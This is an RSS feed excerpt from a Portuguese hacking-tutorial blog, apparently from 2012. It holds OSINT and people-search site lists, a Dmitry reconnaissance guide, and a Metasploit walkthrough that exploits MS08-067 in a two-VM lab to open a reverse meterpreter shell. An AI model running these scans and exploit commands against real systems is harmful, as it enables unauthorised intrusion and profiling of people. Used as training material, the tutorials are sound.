&lt;a href=&quot;http://ebooklink.net/g/detail/1581603967/Improvised%20Lock%20Picking:%20Secrets%20from%20the%20Master/&quot;&gt;http://ebooklink.net/g/detail/1581603967/Improvised%20Lock%20Picking:%20Secrets%20from%20the%20Master/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Complete Guide to Lock Picking by Eddie the Wire - Ebook Detail:&lt;br /&gt;
&lt;a href=&quot;http://ebooklink.net/g/detail/0915179067/Complete%20Guide%20to%20Lock%20Picking%20by%20Eddie%20the%20Wir&quot;&gt;http://ebooklink.net/g/detail/0915179067/Complete%20Guide%20to%20Lock%20Picking%20by%20Eddie%20the%20Wir&lt;/a&gt;e/
&lt;b&gt;&amp;nbsp;&lt;/b&gt; &lt;/div&gt;
&lt;br /&gt;</description><link>http://max-sec.blogspot.com/2012/08/seguranca-fisica-lockpicking.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-3327462761667598413</guid><pubDate>Sun, 05 Aug 2012 13:46:00 +0000</pubDate><atom:updated>2013-07-24T09:11:31.533-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Coleta de informações</category><category domain="http://www.blogger.com/atom/ns#">Tutoriais Hacking</category><title>Recursos Publicos para coletar informações do alvo</title><description>&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;Na internet, Há vários
recursos públicos que podem ser usados para coletar informações sobre o domínio
alvo. Os benefícios de usar esses recursos é que nós não geramos trafico de
rede para o alvo diretamente, então o alvo não pode saber sobre nossas atividades.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;Segue os recursos que podem
ser usados:&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
URL&lt;br /&gt;
&lt;a href=&quot;http://www.archive.org/&quot;&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;http://www.archive.org&lt;/span&gt;&lt;/a&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt; -&amp;nbsp; Contem arquivo dos web sites&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;a href=&quot;http://www.domaintools.com/&quot; target=&quot;_blank&quot;&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;http://www.domaintools.com/ &lt;/span&gt;&lt;/a&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;a href=&quot;http://www.alexa.com/&quot;&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;http://www.alexa.com/&lt;/span&gt;&lt;/a&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt; - Banco de dados de informações dos sites&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;a href=&quot;http://serversniff.net/&quot;&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;http://serversniff.net/&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;mso-ansi-language: PT-BR;&quot;&gt;
&lt;/span&gt;&lt;span style=&quot;mso-ansi-language: PT;&quot;&gt;&lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span lang=&quot;PT&quot;&gt;&quot;canivete suíço&quot; para
redes, serverchecks e roteamento&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;a href=&quot;http://centralops.net/&quot;&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;http://centralops.net/&lt;/span&gt;&lt;/a&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt; - Utilitário de rede gratuito: domain, e-mail,&lt;br /&gt;
browser, ping, traceroute, Whois, e adiante. &lt;span style=&quot;mso-spacerun: yes;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;a href=&quot;http://www.robtex.com/&quot;&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;http://www.robtex.com&lt;/span&gt;&lt;/a&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;&amp;nbsp; - Permite você pesquisar sobre informações de domínio e rede&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;a href=&quot;http://www.pipl.com/&quot;&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;http://www.pipl.com/&lt;/span&gt;&lt;/a&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt; Permite você pesquisar pessoas na internet por Nome, Cidade, Estado e
Pais&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;a href=&quot;http://yoname.com/&quot;&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;http://yoname.com&lt;/span&gt;&lt;/a&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt; - Permite você pesquisar pessoas através de redes sociais, sites e
blogs.&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;a href=&quot;http://wink.com/&quot;&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;http://wink.com/&lt;/span&gt;&lt;/a&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt; - Buscador gratuito para encontrar pessoas pelo Nome, Telefone, Email, web
site, foto e&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot;&gt;adiante.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;CourierStd&amp;quot;,&amp;quot;serif&amp;quot;;&quot;&gt;&lt;a href=&quot;http://www.isearch.com/&quot;&gt;&lt;span lang=&quot;PT-BR&quot;&gt;http://www.isearch.com/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;font-family: &amp;quot;CourierStd&amp;quot;,&amp;quot;serif&amp;quot;;&quot;&gt; - Buscador gratuito para encontrar pessoas
pelo Nome, Telefone ou email&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;CourierStd&amp;quot;,&amp;quot;serif&amp;quot;;&quot;&gt;&lt;a href=&quot;http://www.tineye.com/&quot;&gt;&lt;span lang=&quot;PT-BR&quot;&gt;http://www.tineye.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;font-family: &amp;quot;CourierStd&amp;quot;,&amp;quot;serif&amp;quot;;&quot;&gt; - &lt;/span&gt;&lt;span lang=&quot;PT-BR&quot;&gt;TinEye é um buscador de imagens. Nós podemos
usar TinEye para encontrar de onde a imagem vem, como ela esta sendo usada, se
versões modificadas da imagem existe ou para encontrar versões com resoluções
maiores.&lt;/span&gt;&lt;/span&gt;</description><link>http://max-sec.blogspot.com/2012/08/recursos-publicos-para-coletar.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-7592250193567727798</guid><pubDate>Sat, 04 Aug 2012 04:14:00 +0000</pubDate><atom:updated>2013-07-24T09:13:16.326-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Coleta de informações</category><category domain="http://www.blogger.com/atom/ns#">Tutoriais Hacking</category><title>Usando Dmitry</title><description>&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;A ferramenta mágica para
coleta de informações&lt;b&gt; ( Dmitry)&lt;/b&gt; é uma ferramenta Tudo-em-uma. Ela pode
ser usada para coletar as seguintes informações:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;* O Registro Whois de um
host usando endereço IP ou Domínio.&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;* Informações do Host do
Netcraft.com&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;* Subdomínios no domínio
alvo&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;* Emails do alvo&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;* Lista de porta Aberta,
Filtrada ou fechada na maquina alvo&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;Mesmo embora aquelas
funcionalidades possam ser obtidas usando outros comandos Linux, é muito conveniente
coletar todas essas informações usando uma única ferramenta e salvar o relatório
em um arquivo.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;# dmitry&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;Como um exemplo, vamos
fazer o seguinte no host alvo.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;* Realizar um Whois Lookup
usando o nome de Domínio.&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;* Obter informação do
Netcraft.com&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;* Procurar por todos possíveis
subdomínios&lt;/span&gt;&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;* Procurar por todos os possíveis
endereços de emails&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;O comando é&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;# dmitry -iwnse
host_alvo&lt;/span&gt;&lt;/b&gt;&lt;span lang=&quot;PT-BR&quot; style=&quot;mso-ansi-language: PT-BR;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Uma saida resumida do Dmitry&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1JB95OfrKRl0NqgfR2tU5kObXQOLyJSq7iEtOxZGVydtUWA3z1UcSlfkn1JubA7xfKE6bfuwVr_Tt1gTEiDZuJuFZ8Y84brTUW20qAilqb7GnUcu81fYOJ-xgZ58FlqkNhKoXN81JgoFr/s1600/campinas.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;235&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1JB95OfrKRl0NqgfR2tU5kObXQOLyJSq7iEtOxZGVydtUWA3z1UcSlfkn1JubA7xfKE6bfuwVr_Tt1gTEiDZuJuFZ8Y84brTUW20qAilqb7GnUcu81fYOJ-xgZ58FlqkNhKoXN81JgoFr/s320/campinas.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ( Coletando informações de Whois ) &lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMPh7MYYMDI9YMXfjIsqSjAvlp7dRTZvFBFyktWRst6Wv5OLN_DNOJOfy6U0cvXvdzPklUQzEJN9nUtmiXBLfOZNYt4dea_mImFFNyntsqW-QNMOi3u-ZmgVUJNl67jO7PizdPQPevkd5h/s1600/subdomain.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;237&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMPh7MYYMDI9YMXfjIsqSjAvlp7dRTZvFBFyktWRst6Wv5OLN_DNOJOfy6U0cvXvdzPklUQzEJN9nUtmiXBLfOZNYt4dea_mImFFNyntsqW-QNMOi3u-ZmgVUJNl67jO7PizdPQPevkd5h/s320/subdomain.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ( Coletando informações de subdominio ) &lt;br /&gt;
&lt;br /&gt;
Nós também podemos usar o dmitry para fazer um simples port scanning passando o seguinte comando:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;# dmitry -p host_alvo -f -b &lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Segue uma saida do comando:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTNIiHRl6KhgthV4loJfTQRvjfQOvoZZIN8-B7gWCQSDgHsGZ7nB_kVIjcFKlpdtMnj5pfQm7Fd8Qmpghx84Ue0AKNCTNZIlHEHOR80bAIBI64R5IUXf3LJsXKFAGj02djvNRohxHNt6kN/s1600/portscan.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;218&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTNIiHRl6KhgthV4loJfTQRvjfQOvoZZIN8-B7gWCQSDgHsGZ7nB_kVIjcFKlpdtMnj5pfQm7Fd8Qmpghx84Ue0AKNCTNZIlHEHOR80bAIBI64R5IUXf3LJsXKFAGj02djvNRohxHNt6kN/s320/portscan.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3hukbtmUfveVs-yiIokFaMTKcZlfm7iaK_9RZRBEAsMcAyeeqziQIGQK1Go0jlJ5WIZGHFcj92ZNCbbnJsGRdnO99MTKDW-pJRBqbmqjvy1byNjTeRoxgBICTX1HmpqUMbdadAEPdJz49/s1600/portscan2.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;221&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3hukbtmUfveVs-yiIokFaMTKcZlfm7iaK_9RZRBEAsMcAyeeqziQIGQK1Go0jlJ5WIZGHFcj92ZNCbbnJsGRdnO99MTKDW-pJRBqbmqjvy1byNjTeRoxgBICTX1HmpqUMbdadAEPdJz49/s320/portscan2.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
( Porta 25 aberta )&lt;br /&gt;
&lt;br /&gt;
Até mais.&lt;br /&gt;
&lt;br /&gt;</description><link>http://max-sec.blogspot.com/2012/08/usando-dmitry.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1JB95OfrKRl0NqgfR2tU5kObXQOLyJSq7iEtOxZGVydtUWA3z1UcSlfkn1JubA7xfKE6bfuwVr_Tt1gTEiDZuJuFZ8Y84brTUW20qAilqb7GnUcu81fYOJ-xgZ58FlqkNhKoXN81JgoFr/s72-c/campinas.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-2496444650734020239</guid><pubDate>Thu, 24 May 2012 02:05:00 +0000</pubDate><atom:updated>2013-07-24T09:13:36.860-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutoriais Hacking</category><category domain="http://www.blogger.com/atom/ns#">Tutorias Diversos</category><title>Intrusão Simples com Metasploit</title><description>&lt;br /&gt;
&lt;h3&gt;

&lt;b&gt;Começando!&lt;/b&gt;&lt;/h3&gt;
Bom galera, vamos começar!&lt;br /&gt;
&lt;br /&gt;
Para que você possa ter uma boa noção de como o Metasploit realmente funciona, nada melhor que conseguir obter o acesso a uma máquina (virtual) e assim poder testar e estudar todas suas funcionalidades, ficando cada dia mais &quot;afiado&quot; em seus testes de intrusão. Sim, este artigo é bem básico.&lt;br /&gt;
&lt;br /&gt;
O cenário utilizado foi o seguinte:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://i.imgur.com/E27Kk.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;129&quot; src=&quot;http://i.imgur.com/E27Kk.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Neste caso são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs estão configuradas como bridge.&lt;br /&gt;
1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170.&lt;br /&gt;
2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186.&lt;br /&gt;
&lt;br /&gt;
&lt;h3&gt;

Scanning com Nmap e Metasploit&lt;/h3&gt;
Ok pessoal, vamos utilizar a ferramenta &quot;nmap&quot; para fazer o scanning em nossa rede interna.&lt;br /&gt;
Abra um terminal no micro com o Backtrack e digite o seguinte comando:&lt;br /&gt;
&lt;br /&gt;
# &lt;b&gt;nmap -v --script=smb-check-vulns 192.168.0.0/2&lt;/b&gt;4&lt;br /&gt;
-v = Modo Verbose&lt;br /&gt;
&amp;nbsp;--script=smb-check-vulns = Script para verificar vulnerabilidades conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit.&lt;br /&gt;
192.168.0.0/24 = Range de IP utilizado em minha rede local.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://i.imgur.com/3VtxM.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;294&quot; src=&quot;http://i.imgur.com/3VtxM.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Se repararem, no host com endereço IP 192.168.0.186, verá que são mostradas as portas que estão abertas, e em MS08-067 está como VULNERABLE, tendo essa &quot;simples&quot; base, vamos atacá-lo.&lt;br /&gt;
&lt;br /&gt;
Certo, descobrimos um host dentro da nossa LAN que está possivelmente vulnerável ao nosso ataque pretendido!&lt;br /&gt;
Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e...&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://i.imgur.com/x5R0X.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;231&quot; src=&quot;http://i.imgur.com/x5R0X.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Obtemos nosso console do msf. Dei uma personalizada na saída. :-)&lt;br /&gt;
&lt;br /&gt;
Feito isto, vamos efetuar a intrusão na máquina. Os comandos são os seguintes:&lt;br /&gt;
&lt;b&gt;use exploit/windows/smb/ms08_067_netapi&amp;nbsp;&lt;/b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#Aqui falamos que queremos usar o exploit ms08_067_netapi&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;set RHOST 192.168.0.186 &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/b&gt; #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;set PAYLOAD windows/meterpreter/reverse_tcp&lt;/b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;set LHOST 192.168.0.170&lt;/b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;exploit&amp;nbsp;&lt;/b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; #E finalmente executamos nosso exploit.&lt;br /&gt;
&lt;br /&gt;
Observem a imagem abaixo.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://i.imgur.com/T5ey2.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;267&quot; src=&quot;http://i.imgur.com/T5ey2.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Pronto!&lt;br /&gt;
Ganhamos nossa shell meterpreter, ou seja, já estamos na máquina alvo. Experimente dar os comandos &lt;b&gt;sysinfo e ipconfig.&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://i.imgur.com/o86rY.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;257&quot; src=&quot;http://i.imgur.com/o86rY.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Ok!&lt;br /&gt;
Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit.&lt;br /&gt;
&lt;h3&gt;

&lt;b&gt;Opções Metasploit&lt;/b&gt;&lt;/h3&gt;
Quando executamos o comando exploit, será realizado um &quot;fingerprint&quot; para a detecção do sistema operacional e verificar se o mesmo consta em sua lista de SOs vulneráveis.&lt;br /&gt;
&lt;br /&gt;
Como vimos através do script do nmap que nosso alvo é vulnerável, nós podemos realizar o processo de fingerprint e passar as especificações corretas para o msf, assim nosso exploit não precisará realizar esta etapa, gerando possibilidades menores de erros.&lt;br /&gt;
&lt;br /&gt;
Certo, mas como? Vamos utilizar um módulo auxiliar presente no Metasploit para descobrir a versão do SO, o idioma, nome da máquina e o domínio.&lt;br /&gt;
&lt;br /&gt;
Executaremos os seguintes comandos no console do msf:&lt;br /&gt;
&lt;b&gt;use auxiliary/scanner/smb/smb_version&lt;/b&gt; #Falamos que queremos utilizar o scanner smb_version.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;set RHOSTS 192.168.0.186&lt;/b&gt; #Aqui eu setei um único host (192.168.0.186), mas poderia especificar um range, exemplo, 192.168.0.0/24.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;run&lt;/b&gt; #Comando para executar nosso scanner.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://i.imgur.com/TNsUC.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;186&quot; src=&quot;http://i.imgur.com/TNsUC.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Agora já sabemos a versão certa do SO e o idioma, com isso especificaremos em nosso exploit usando a opção &lt;b&gt;set TARGET&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;use exploit/windows/smb/ms08_067_netapi &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/b&gt;#Aqui falamos que queremos usar o exploit ms08_067_netapi&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;set RHOST 192.168.0.186 &lt;/b&gt;&amp;nbsp; &amp;nbsp;#Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;set PAYLOAD windows/meterpreter/reverse_tcp&lt;/b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;#Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;set LHOST 192.168.0.170&lt;/b&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp;#Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;set TARGET 31 &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/b&gt; #Aqui eu digo que o alvo usa&lt;br /&gt;
&lt;b&gt;exploit &lt;/b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; #E finalmente executamos nosso exploit.&lt;br /&gt;
&lt;br /&gt;
Na imagem abaixo,com o comando show targets são listados todos os S.O.s vulneráveis a este exploit (ms08_067).&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://i.imgur.com/1VeU7.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;240&quot; src=&quot;http://i.imgur.com/1VeU7.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Veja abaixo que iremos utilizar a opção 31.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://i.imgur.com/d69hG.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://i.imgur.com/d69hG.png&quot; width=&quot;309&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Veja o ataque agora.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://i.imgur.com/ffv62.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;147&quot; src=&quot;http://i.imgur.com/ffv62.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
